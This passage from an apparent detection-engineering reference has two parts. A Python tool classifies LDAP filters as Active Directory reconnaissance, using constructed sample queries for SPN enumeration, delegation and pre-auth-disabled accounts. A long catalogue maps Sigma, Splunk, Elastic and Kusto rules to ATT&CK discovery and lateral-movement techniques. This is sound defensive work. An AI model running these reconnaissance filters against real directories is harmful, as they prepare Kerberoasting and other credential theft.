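_LEAF = re.compile(r"([^:=<>~]+)(?::([^:=]+))?(:?[<>~]?=)(.*)")


def _parse(s: str, i: int):
    """Recursive descent over the parenthesised filter starting at s[i].
    Returns (node, index past its ')'). Nodes: ('&'|'|', [subs]),
    ('!', sub) or ('=', attr_lower, matching_rule_or_None, value)."""
    if s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    if s[i] in "&|":
        op, subs, i = s[i], [], i + 1
        while s[i] == "(":
            sub, i = _parse(s, i)
            subs.append(sub)
        if s[i] != ")":
            raise ValueError(f"expected ')' at offset {i}")
        return (op, subs), i + 1
    if s[i] == "!":
        sub, i = _parse(s, i + 1)
        if s[i] != ")":
            raise ValueError(f"expected ')' at offset {i}")
        return ("!", sub), i + 1
    j = s.index(")", i)            # RFC 4515 escapes ')' inside values as \29
    m = _LEAF.fullmatch(s[i:j])
    if not m:
        raise ValueError(f"bad filter item: {s[i:j]!r}")
    attr, rule, _, value = m.groups()
    return ("=", attr.lower(), rule, value), j + 1


def parse_filter(s: str):
    s = s.strip()
    node, end = _parse(s, 0)
    if end != len(s):
        raise ValueError("trailing data after filter")
    return node


def leaves(node):
    if node[0] == "=":
        yield node
    elif node[0] == "!":
        yield from leaves(node[1])
    else:
        for sub in node[1]:
            yield from leaves(sub)


def classify(filter_str: str) -> set:
    """Recon categories one filter exhibits (category names are assumptions)."""
    lvs = list(leaves(parse_filter(filter_str)))
    tags = set()
    for _, attr, rule, value in lvs:
        if attr == "serviceprincipalname" and value == "*":
            tags.add("spn_enumeration")            # Kerberoasting preparation
        elif attr == "admincount" and value == "1":
            tags.add("privileged_object_recon")
        elif attr == "msds-allowedtodelegateto" and value == "*":
            tags.add("constrained_delegation")
        elif attr == "useraccountcontrol" and rule == LDAP_BIT_AND and value.isdigit():
            bits = int(value)
            if bits & UAC_TRUSTED_FOR_DELEGATION:
                tags.add("unconstrained_delegation")
            if bits & UAC_DONT_REQ_PREAUTH:
                tags.add("preauth_not_required")
    # A filter built only from class/category terms pulls every object of that kind.
    attrs = {attr for _, attr, _, _ in lvs}
    if attrs and attrs <= {"objectcategory", "objectclass", "samaccounttype"}:
        tags.add("broad_enumeration")
    return tags


def suspicious_clients(queries, min_categories=2):
    """Clients whose filters span >= min_categories recon categories.
    queries: iterable of (client, filter) pairs, e.g. from DC LDAP logging."""
    seen = defaultdict(set)
    for client, flt in queries:
        seen[client] |= classify(flt)
    return {c: sorted(t) for c, t in seen.items() if len(t) >= min_categories}


SAMPLE_LDAP_QUERIES = [  # constructed, not real traffic
    ("10.0.0.5", "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"),
    ("10.0.0.5", "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=524288))"),
    ("10.0.0.5", "(adminCount=1)"),
    ("10.0.0.5", "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"),
    ("10.0.0.40", "(&(objectClass=user)(sAMAccountName=jdoe))"),   # ordinary lookup
    ("10.0.0.41", "(&(objectCategory=computer)(name=WS01))"),       # ordinary lookup
    ("10.0.0.42", "(objectCategory=person)"),                       # broad, but alone
]

if __name__ == "__main__":
    for client, flt in SAMPLE_LDAP_QUERIES:
        print(client, sorted(classify(flt)) or "-", flt)
    print("suspicious:", suspicious_clients(SAMPLE_LDAP_QUERIES))
```

Working at the filter layer has an obvious advantage over the command-line rules in this list: a renamed AdFind, a custom .NET collector over ADWS, or an ldapsearch from a Linux foothold all send the same `servicePrincipalName=*` or bit-AND on userAccountControl. The cost is that a single category fires constantly from legitimate tooling (monitoring agents query adminCount, Exchange queries SPNs), which is why the example only surfaces a client once its queries span several categories.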
Account Discovery: Local Account T1087.001 38 rules
- Sigma BloodHound Collection Files test
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Splunk CSVDE Export Active Directory (PowerShell)
- Splunk CSVDE Export Active Directory (Sysmon)
- Splunk CSVDE Export Active Directory (Windows Event Log)
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Elastic Enumeration of Administrator Accounts production
- Splunk GetLocalUser with PowerShell production
- Splunk GetLocalUser with PowerShell Script Block production
- Splunk GetWmiObject User Account with PowerShell production
- Splunk GetWmiObject User Account with PowerShell Script Block production
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Splunk Local Account Discovery With Wmic production
- Sigma Local Accounts Discovery test
- Sigma Local domain group enumeration experimental
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Sigma Net.EXE Execution test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Sigma Suspicious Group And Account Reconnaissance Activity Using Net.EXE test
- Sigma Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet test
- Sigma Suspicious Use of PsLogList test
- Sigma User properties enumeration via commandline
- Splunk Windows Account Discovery for None Disable User Account production
- Elastic Windows Account or Group Discovery production
- Splunk Windows SOAPHound Binary Execution production
- Splunk Windows User Discovery Via Net production
Account Discovery: Domain Account T1087.002 84 rules
- Sigma Active Directory Computers Enumeration With Get-AdComputer test
- Sigma Active Directory Database Snapshot Via ADExplorer test
- Elastic Active Directory Discovery using AdExplorer production
- Sigma Active Directory Structure Export Via Csvde.EXE test
- Sigma AD Privileged Users or Groups Reconnaissance test
- Sigma ADExplorer Writing Complete AD Snapshot Into .dat File experimental
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Splunk AdsiSearcher Account Discovery production
- Kusto ADWS Connection from Process Injection Target
- Kusto ADWS Connection from Unexpected Binary
- Sigma BloodHound Collection Files test
- Splunk Common Active Directory Commands (PowerShell)
- Splunk Common Active Directory Commands (Sysmon)
- Splunk Common Active Directory Commands (Windows Event Log)
- Splunk CSVDE Export Active Directory (PowerShell)
- Splunk CSVDE Export Active Directory (Sysmon)
- Splunk CSVDE Export Active Directory (Windows Event Log)
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Splunk Domain Account Discovery with Dsquery production
- Splunk Domain Account Discovery with Wmic production
- Sigma Domain group enumeration experimental
- Elastic Enumeration of Administrator Accounts production
- Splunk Get ADUser with PowerShell production
- Splunk Get ADUser with PowerShell Script Block production
- Splunk Get DomainUser with PowerShell production
- Splunk Get DomainUser with PowerShell Script Block production
- Splunk GetWmiObject DS User with PowerShell production
- Splunk GetWmiObject DS User with PowerShell Script Block production
- Sigma Group discovery (command)
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Kusto Large number of AD objects accessed by user
- Kusto LDAP reconnaissance via search filters
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Sigma Net.EXE Execution test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Sigma Potential Active Directory Reconnaissance/Enumeration Via LDAP test
- Sigma Potential AD User Enumeration From Non-Machine Account test
- Elastic Potential Enumeration via Active Directory Web Service production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto Probable AdFind Recon Tool Usage available
- Sigma PUA - AdFind Suspicious Execution test
- Sigma PUA - AdFind.EXE Execution experimental
- Sigma PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE test
- Sigma Reconnaissance Activity test
- Sigma Renamed AdFind Execution test
- Splunk SchCache Change By App Connect And Create ADSI Object production
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Suspicious Access to LDAP Attributes production
- Sigma Suspicious Active Directory Database Snapshot Via ADExplorer test
- Sigma Suspicious Group And Account Reconnaissance Activity Using Net.EXE test
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (native commands) experimental
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (PowerShell) experimental
- Sigma Suspicious Use of PsLogList test
- Sigma User properties enumeration via commandline
- Splunk User_Domain Enumeration Tool - Windows (PowerShell)
- Splunk User_Domain Enumeration Tool - Windows (Sysmon)
- Splunk User_Domain Enumeration Tool - Windows (Windows Event Log)
- Elastic Windows Account or Group Discovery production
- Splunk Windows AD Abnormal Object Access Activity production
- Splunk Windows AD Privileged Object Access Activity production
- Splunk Windows Domain Account Discovery Via Get-NetComputer production
- Splunk Windows Find Domain Organizational Units with GetDomainOU production
- Splunk Windows Find Interesting ACL with FindInterestingDomainAcl production
- Splunk Windows Forest Discovery with GetForestDomain production
- Splunk Windows Get Local Admin with FindLocalAdminAccess production
- Splunk Windows Linked Policies In ADSI Discovery production
- Splunk Windows Root Domain linked policies Discovery production
- Splunk Windows SOAPHound Binary Execution production
- Splunk Windows Suspect Process With Authentication Traffic production
Peripheral Device Discovery T1120 5 rules
- Sigma Fsutil Drive Enumeration test
- Splunk Fsutil fsinfo execution (EDR)
- Splunk Fsutil fsinfo execution (Windows Event Log)
- Elastic Peripheral Device Discovery production
- Sigma Powershell Suspicious Win32_PnPEntity test
System Time Discovery T1124 5 rules
- Sigma Discovery of a System Time test
- Elastic System Time Discovery production
- Splunk System Time enumeration (Windows Event Log)
- Sigma Use of W32tm as Timer test
- Splunk Windows System Time Discovery W32tm Delay production
Network Share Discovery T1135 28 rules
- Splunk Advanced IP or Port Scanner Execution production
- Kusto Excessive share permissions available
- Sigma File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell test
- Sigma HackTool - SharpView Execution test
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Sigma Net.EXE Execution test
- Sigma Network share discovery and/or connection via commandline
- Splunk Network Share Discovery Via Dir Command production
- Sigma Potential Dridex Activity stable
- Elastic Potential Network Share Discovery production
- Splunk PowerHuntShares Commands (PowerShell)
- Splunk PowerHuntShares Commands (Sysmon)
- Splunk PowerHuntShares Commands (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk PowerView_SharpView Commands (PowerShell)
- Sigma PUA - Advanced IP Scanner Execution test
- Sigma PUA - Advanced Port Scanner Execution test
- Sigma SharpHound enumeration via SMB named pipes experimental
- Elastic System Service Discovery through built-in Windows Utilities production
- Sigma Turla Group Lateral Movement test
- Splunk Windows Administrative Shares Accessed On Multiple Hosts production
- Splunk Windows File Share Discovery With Powerview production
- Splunk Windows Large Number of Computer Service Tickets Requested production
- Elastic Windows Network Enumeration production
- Splunk Windows Network Share Interaction Via Net production
- Splunk Windows Special Privileged Logon On Multiple Hosts production
Password Policy Discovery T1201 17 rules
- Sigma Domain password policy enumeration experimental
- Splunk Get ADDefaultDomainPasswordPolicy with Powershell production
- Splunk Get ADDefaultDomainPasswordPolicy with Powershell Script Block production
- Splunk Get ADUserResultantPasswordPolicy with Powershell production
- Splunk Get ADUserResultantPasswordPolicy with Powershell Script Block production
- Splunk Get DomainPolicy with Powershell production
- Splunk Get DomainPolicy with Powershell Script Block production
- Sigma HackTool - CrackMapExec Execution test
- Kusto LDAP reconnaissance via search filters
- Sigma Net.EXE Execution test
- Sigma Password policy discovery via commandline
- Sigma Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy test
- Sigma Password Policy Enumerated test
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Windows Account or Group Discovery production
- Splunk Windows Password Policy Discovery with Net production
Browser Information Discovery T1217 4 rules
- Sigma Automated Collection Bookmarks Using Get-ChildItem PowerShell test
- Sigma File And SubFolder Enumeration Via Dir Command test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Suspicious Where Execution test
Domain Trust Discovery T1482 53 rules
- Sigma Active Directory Database Snapshot Via ADExplorer test
- Elastic Active Directory Discovery using AdExplorer production
- Sigma Active Directory Forest PowerShell class called from a non administrative host experimental
- Sigma ADExplorer Writing Complete AD Snapshot Into .dat File experimental
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Sigma BloodHound Collection Files test
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Kusto Dev-0270 WMIC Discovery available
- Sigma DNS Server Discovery Via LDAP Query test
- Splunk Domain Trust Discovery Commands - Windows (PowerShell)
- Splunk Domain Trust Discovery Commands - Windows (Windows Event Log)
- Sigma Domain Trust Discovery Via Dsquery test
- Splunk DSQuery Domain Discovery production
- Elastic Enumerating Domain Trusts via DSQUERY.EXE production
- Elastic Enumerating Domain Trusts via NLTEST.EXE production
- Splunk Get-DomainTrust with PowerShell production
- Splunk Get-DomainTrust with PowerShell Script Block production
- Splunk Get-ForestTrust with PowerShell production
- Splunk Get-ForestTrust with PowerShell Script Block production
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - SharpView Execution test
- Sigma HackTool - TruffleSnout Execution test
- Kusto LDAP reconnaissance via search filters
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Splunk NLTest Domain Trust Discovery production
- Sigma Nltest.EXE Execution test
- Sigma Potential Active Directory Reconnaissance/Enumeration Via LDAP test
- Sigma Potential Recon Activity Via Nltest.EXE test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto Probable AdFind Recon Tool Usage available
- Sigma PUA - AdFind Suspicious Execution test
- Sigma Renamed AdFind Execution test
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Suspicious Access to LDAP Attributes production
- Sigma Suspicious Active Directory Database Snapshot Via ADExplorer test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows SOAPHound Binary Execution production
Virtualization/Sandbox Evasion T1497 14 rules
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Splunk Headless Browser Usage production
- Splunk Ping Sleep Batch Command production
- Sigma Powershell Detect Virtualization Environment test
- Splunk Windows Chromium Browser Launched with Small Window Size production
- Splunk Windows Chromium Browser No Security Sandbox Process production
- Splunk Windows Chromium Browser with Custom User Data Directory production
- Splunk Windows Chromium process Launched with Disable Popup Blocking production
- Splunk Windows Chromium Process Launched with Logging Disabled production
- Splunk Windows Chromium Process with Disabled Extensions production
- Splunk Windows Time Based Evasion production
- Splunk Windows Time Based Evasion via Choice Exec production
Virtualization/Sandbox Evasion: Time Based Checks T1497.003 4 rules
- Elastic Delayed Execution via Ping production
- Splunk Ping Sleep Batch Command production
- Splunk Windows Time Based Evasion production
- Splunk Windows Time Based Evasion via Choice Exec production
Software Discovery T1518 22 rules
- Splunk Application Discovery - Windows (PowerShell)
- Splunk Application Discovery - Windows (Sysmon)
- Splunk Application Discovery - Windows (Windows Event Log)
- Sigma Detected Windows Software Discovery test
- Sigma Detected Windows Software Discovery - PowerShell test
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Sigma Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Security Software Discovery using WMIC production
- Splunk Security Software Discovery via Findstr.exe (PowerShell)
- Splunk Security Software Discovery via Findstr.exe (Sysmon)
- Splunk Security Software Discovery via Findstr.exe (Windows Event Log)
- Sigma Security Software Discovery Via Powershell Script test
- Splunk Security Software Discovery via WMI (PowerShell)
- Splunk Security Software Discovery via WMI (Sysmon)
- Splunk Security Software Discovery via WMI (Windows Event Log)
- Sigma Security Tools Keyword Lookup Via Findstr.EXE test
- Sigma SQL Server database's table enumeration experimental
- Sigma Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE test
- Splunk Windows Software Discovery Via PowerShell production
Software Discovery: Security Software Discovery T1518.001 12 rules
- Sigma Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Security Software Discovery using WMIC production
- Splunk Security Software Discovery via Findstr.exe (PowerShell)
- Splunk Security Software Discovery via Findstr.exe (Sysmon)
- Splunk Security Software Discovery via Findstr.exe (Windows Event Log)
- Sigma Security Software Discovery Via Powershell Script test
- Splunk Security Software Discovery via WMI (PowerShell)
- Splunk Security Software Discovery via WMI (Sysmon)
- Splunk Security Software Discovery via WMI (Windows Event Log)
- Sigma Security Tools Keyword Lookup Via Findstr.EXE test
- Sigma Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE test
Cloud Service Discovery T1526 1 rule
- Sigma PUA - Seatbelt Execution test
System Location Discovery T1614 6 rules
- Sigma Console CodePage Lookup Via CHCP test
- Splunk Discovery using CHCP (Sysmon)
- Splunk Discovery using CHCP (Windows Event Log)
- Elastic External IP Lookup from Non-Browser Process production
- Sigma System Language Discovery via Reg.Exe experimental
- Elastic System Time Discovery production
System Location Discovery: System Language Discovery T1614.001 4 rules
- Sigma Console CodePage Lookup Via CHCP test
- Splunk Discovery using CHCP (Sysmon)
- Splunk Discovery using CHCP (Windows Event Log)
- Sigma System Language Discovery via Reg.Exe experimental
Group Policy Discovery T1615 9 rules
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma Gpresult Display Group Policy Information test
- Elastic Group Policy Discovery via Microsoft GPResult Utility production
- Sigma HackTool - SharpUp PrivEsc Tool Execution test
- Sigma Potential Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Suspicious GPO Discovery With Get-GPO test
- Sigma Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS test
- Splunk Windows WinPEAS PowerShell Script Execution production
Debugger Evasion T1622 1 rule
- Sigma PUA - Process Hacker Execution test
Log Enumeration T1654 1 rule
- Splunk Windows EventLog Recon Activity Using Log Query Utilities production
Lateral Movement
Remote Services T1021 242 rules
- Sigma Access To ADMIN$ Network Share test
- Sigma Active Directory honeypot used for lateral movement experimental
- Splunk Allow Inbound Traffic By Firewall Rule Registry production
- Splunk Allow Inbound Traffic In Firewall Rule production
- Kusto Anomaly in SMB Traffic (ASIM Network Session schema) available
- Elastic At.exe Command Lateral Movement production
- Sigma BaaUpdate.exe Suspicious DLL Load experimental
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma Copy From Or To Admin Share Or Sysvol Folder test
- YARA-L Copy From Or To Admin Share Or Sysvol Folder
- Sigma DCERPC SMB Spoolss Named Pipe test
- Sigma DCOM InternetExplorer.Application Iertutil DLL Hijack - Security test
- Kusto DCOM Lateral Movement available
- Sigma DCOM lateral movement (via MMC20) experimental
- Sigma Denied Access To Remote Desktop test
- Sigma Denied RDP login with valid credentials experimental
- Splunk Detect PsExec With accepteula Flag production
- Kusto Detecting Macro Invoking ShellBrowserWindow COM Objects available
- Splunk Enable RDP In Other Port Number production
- Sigma Enable Windows Remote Management test
- Splunk Executable File Written in Administrative SMB Share production
- Sigma Execute Invoke-command on Remote Host test
- Elastic Execution via TSClient Mountpoint production
- Sigma First Time Seen Remote Named Pipe test
- Sigma HackTool - NetExec Execution experimental
- Sigma HackTool - NetExec File Indicators experimental
- Sigma HackTool - Potential Impacket Lateral Movement Activity stable
- Sigma HackTool - SharpMove Tool Execution test
- Sigma HackTool - WinRM Access Via Evil-WinRM test
- Sigma Hermetic Wiper TG Process Patterns test
- Sigma Impacket DCOMexec privilege abuse via MMC experimental
- Sigma Impacket DCOMexec process abuse via MMC experimental
- Splunk Impacket Lateral Movement Activity (Sysmon)
- Splunk Impacket Lateral Movement Activity (Windows Event Log)
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Splunk Impacket PSexec (Windows Event Log)
- Sigma Impacket PsExec Execution test
- Splunk Impacket SMBexec (Windows Event Log)
- Sigma Impacket WMIexec execution via SMB admin share experimental
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Elastic Incoming DCOM Lateral Movement with MMC production
- Elastic Incoming DCOM Lateral Movement with ShellBrowserWindow or ShellWindows production
- Elastic Incoming Execution via PowerShell Remoting production
- Elastic Incoming Execution via WinRM Remote Shell production
- Splunk Interactive Session on Remote Endpoint with PowerShell production
- Splunk Invoke-DCOM.ps1 - PowerShell (PowerShell)
- Splunk Invoke-DCOM.ps1 - PowerShell (Sysmon)
- Splunk Invoke-DCOM.ps1 - PowerShell (Windows Event Log)
- Sigma Lateral movement by mounting a network share - net use (command) experimental
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Kusto Lateral Movement via DCOM available
- Elastic Lateral Movement via Startup Folder production
- Sigma Metasploit Or Impacket Service Installation Via SMB PsExec test
- Sigma Metasploit SMB Authentication test
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share Basic
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With Asset Entity
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With User Enrichment
- YARA-L MITRE ATT&CK T1021.002 Windows Admin Share With User Entity
- Splunk Mmc LOLBAS Execution Process Spawn production
- Sigma MMC Spawning Windows Shell test
- Sigma MMC20 Lateral Movement test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk MSTSC Execution (EDR)
- Splunk MSTSC Execution (Windows Event Log)
- Kusto Multiple RDP connections from Single System
- Sigma Net.EXE Execution test
- Splunk Net.exe Use with URL (Sysmon)
- Splunk Net.exe Use with URL (Windows Event Log)
- Sigma Network share manipulation via commandline
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma New network file share created experimental
- Sigma New Remote Desktop Connection Initiated Via Mstsc.EXE test
- Elastic NullSessionPipe Registry Modification production
- Sigma Number of outstanding SMB requests increased experimental
- Sigma OpenEDR Spawning Command Shell experimental
- Sigma OpenSSH native server feature installation experimental
- Sigma OpenSSH Server Listening On Socket test
- Sigma OpenSSH server listening on socket experimental
- Sigma OpenSSH service activation on Windows experimental
- Sigma Outbound RDP Connections Over Non-Standard Tools test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Password Provided In Command Line Of Net.EXE test
- Sigma Port Forwarding Activity Via SSH.EXE test
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack test
- Sigma Potential DCOM InternetExplorer.Application DLL Hijack - Image Load test
- Splunk Potential EternalBlue via Metasploit (Windows Event Log)
- Sigma Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp test
- Sigma Potential Lateral Movement via Windows Remote Shell experimental
- Elastic Potential Lateral Tool Transfer via SMB Share production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential Network Share Discovery production
- Elastic Potential Outgoing RDP Connection by Unusual Process production
- Elastic Potential Ransomware Behavior - Note Files by System production
- Elastic Potential Ransomware Note File Dropped via SMB production
- Elastic Potential Remote Credential Access via Registry production
- Elastic Potential Remote Desktop Shadowing Activity production
- Sigma Potential Remote Desktop Tunneling test
- Elastic Potential Remote Desktop Tunneling Detected production
- Sigma Potential Remote PowerShell Session Initiated test
- YARA-L Potential Remote PowerShell Session Initiated
- Elastic Potential SharpRDP Behavior production
- Sigma Potential Tampering With RDP Related Registry Keys Via Reg.EXE test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Remote Services Add TrustedHost production
- Sigma Privilege Escalation via Named Pipe Impersonation test
- Sigma Protected Storage Service Access test
- Sigma Psexec Execution test
- Sigma PSexec execution over SMB share experimental
- Elastic PsExec Network Connection production
- Sigma PUA - CSExec Default Named Pipe test
- Sigma PUA - RemCom Default Named Pipe test
- Kusto Rare RDP Connections
- Splunk RDP Connection (Sysmon)
- Splunk RDP Connection (Windows Event Log)
- Sigma RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class experimental
- Splunk RDP Enabled (PowerShell)
- Splunk RDP Enabled (Sysmon)
- Splunk RDP Enabled (Windows Event Log)
- Elastic RDP Enabled via Registry production
- Splunk RDP File Executed from Outlook Temp Directory (Sysmon)
- Splunk RDP File Executed from Outlook Temp Directory (Windows Event Log)
- Splunk RDP File Written by Outlook (Sysmon)
- Splunk RDP File Written by Outlook (Windows Event Log)
- Sigma RDP Login from Localhost test
- Splunk RDP Logon_Logoff Event (Windows Event Log)
- Kusto RDP Nesting
- Sigma RDP Over Reverse SSH Tunnel test
- Sigma RDP over Reverse SSH Tunnel WFP test
- Sigma RDP shadow session configuration enabled (registry) experimental
- Sigma RDP shadow session started (command) experimental
- Sigma RDP to HTTP or HTTPS Target Ports test
- Sigma RDP tunneling configuration enabled for port forwarding experimental
- Sigma RDP tunneling via ngrok detected experimental
- Splunk Remote Admin Tools (EDR)
- Splunk Remote Admin Tools (PowerShell)
- Splunk Remote Admin Tools (Sysmon)
- Splunk Remote Admin Tools (Windows Event Log)
- Elastic Remote Desktop Enabled in Windows Firewall by Netsh production
- Splunk Remote Desktop Process Running On System experimental
- Kusto Remote Desktop Protocol - SharpRDP available
- Elastic Remote Execution via File Shares production
- Elastic Remote File Copy to a Hidden Share production
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Remote PowerShell Session (PS Classic) test
- Sigma Remote PowerShell Session (PS Module) test
- Sigma Remote PowerShell Session Host Process (WinRM) test
- Splunk Remote Process Instantiation via DCOM and PowerShell production
- Splunk Remote Process Instantiation via DCOM and PowerShell Script Block production
- Splunk Remote Process Instantiation via WinRM and PowerShell production
- Splunk Remote Process Instantiation via WinRM and PowerShell Script Block production
- Splunk Remote Process Instantiation via WinRM and Winrs production
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Remote Service Activity via SVCCTL Named Pipe test
- Sigma Remote shell execution via SMB admin share experimental
- Elastic Remote Windows Service Installed production
- Elastic Remotely Started Services via RPC production
- Sigma Rundll32 Execution Without Parameters test
- Sigma Rundll32 UNC Path Execution test
- Elastic Service Command Lateral Movement production
- Sigma Shared printer creation (PrintNightmare vulnerability - CVE-2021-36958) experimental
- Sigma SMB admin share accessed experimental
- Elastic SMB Connections via LOLBin or Untrusted Process production
- Sigma SMB Create Remote File Admin Share test
- Splunk SMB Write Access on Administrative Share (Windows Event Log)
- Kusto SMB/Windows Admin Shares available
- Sigma smbexec.py Service Installation test
- Sigma Suspicious BitLocker Access Agent Update Utility Execution experimental
- Elastic Suspicious Cmd Execution via WMI production
- Elastic Suspicious Execution from a WebDav Share production
- Elastic Suspicious File Renamed via SMB production
- Sigma Suspicious New-PSDrive to Admin Share test
- Sigma Suspicious permissions modification on a network share experimental
- Sigma Suspicious Plink Port Forwarding test
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Sigma Suspicious PsExec Execution test
- Sigma Suspicious RDP Redirect Using TSCON test
- Elastic Suspicious Remote Registry Access via SeBackupPrivilege production
- Sigma Suspicious Speech Runtime Binary Child Process experimental
- Sigma Suspicious UltraVNC Execution test
- Sigma Suspicious WSMAN Provider Image Loads test
- Sigma T1047 Wmiprvse Wbemcomn DLL Hijack test
- Sigma Turla Group Lateral Movement test
- Sigma Unsigned or Unencrypted SMB Connection to Share Established experimental
- Sigma User Added to Remote Desktop Users Group test
- Sigma Windows Admin Share Mount Via Net.EXE test
- Splunk Windows Admin$ Share Access (Sysmon)
- Splunk Windows Admin$ Share Access (Windows Event Log)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows C$ Share Access (EDR)
- Splunk Windows C$ Share Access (Sysmon)
- Splunk Windows C$ Share Access (Windows Event Log)
- Splunk Windows Default RDP File Creation By Non MSTSC Process production
- Splunk Windows Default Rdp File Unhidden production
- Splunk Windows Excel Spawning Microsoft Project Application production
- Sigma Windows Internet Hosted WebDav Share Mount Via Net.EXE test
- Splunk Windows IPC$ Share Access (Sysmon)
- Splunk Windows IPC$ Share Access (Windows Event Log)
- Splunk Windows MSTSC RDP Commandline production
- Splunk Windows Process Execution From RDP Share production
- Splunk Windows Protocol Tunneling with Plink production
- Splunk Windows PUA Named Pipe production
- Splunk Windows PuTTY Suite Utility Execution production
- Splunk Windows RDP Bitmap Cache File Creation production
- Splunk Windows RDP Client Launched with Admin Session production
- Splunk Windows RDP File Execution production
